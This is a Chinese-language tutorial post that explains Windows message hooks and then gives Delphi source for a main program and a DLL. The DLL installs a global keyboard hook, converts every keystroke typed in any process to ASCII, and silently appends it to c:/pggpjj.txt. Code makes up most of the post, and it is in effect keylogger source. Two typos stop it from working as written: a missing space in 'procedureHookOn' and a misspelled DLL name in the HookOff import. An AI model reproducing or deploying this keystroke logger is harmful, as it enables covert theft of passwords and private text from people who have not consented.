何谓钩子,钩子其实在消息链中插入一个函数用来监控
消息。当然这个钩子起到过虑消息的作用。对于监控的
是系统消息当然不能用exe文件封装其子函数,因为exe
进程对于其它进程是不透明的。那怎么办,当然想到dll
文件,把dll映射到其他的进程空间中,不就解决了。
下面给一个键盘的钩子-对wm_keydown,wm_keyup按键消息
进行过滤。
主程序
program UseHook;
uses Windows;
var mStruct: TMsg;
procedureHookOn; external 'pggpjjhook.dll';
procedure HookOff; external 'pggpjjkook.dll';
begin
HookOn; // 挂钩
While GetMessage(mStruct, 0, 0, 0) do;//消息循环
HookOff;// 脱钩
end.
-----------------
dll文件
library pggpjjhook;
uses
Windows ;
var
KBS: TKeyboardState;//键盘状态
HookH: DWORD; //钩子句柄
FileH: DWORD; //文件句柄
FSize: DWORD=1; //待写长度
Wsize: DWORD; //实写长度
Fchar: array[0..1] of Char;// 待写字符
// 键盘钩子回调用函数
function KeyHookPro(Code: Integer; wParam: WPARAM; lParam: LPARAM): LRESULT; stdcall;
begin
if (code=HC_ACTION)and(((LParam shr 31)and 1)=0) then//按键消息队伍active
begin
GetKeyboardState(KBS);//
if ToAscii(WParam, ((LParam shr 16)and$000000FF), KBS, @Fchar[0] ,0)=1 then
begin
FileH:=CreateFile(PChar('c:/pggpjj.txt'), GENERIC_READ or GENERIC_WRITE,
0, nil, Open_Always, FILE_ATTRIBUTE_NORMAL, 0);//
SetFilePointer(FileH, 0, nil, 2);
WriteFile(FileH, Fchar[0], FSize, Wsize, nil);//写入键的ascii值
CloseHandle(FileH);
end;
end;
Result := CallNextHookEx(HookH, Code, wParam, lParam);
end;
// 挂钩
procedure HookOn;
begin
HookH := SetWindowsHookEx(WH_KEYBOARD, KeyHookPro, HInstance, 0);
end;
// 脱钩
procedure HookOff;
begin
UnHookWindowsHookEx(HookH);
end;
exports
HookOn,HookOff;
begin
end.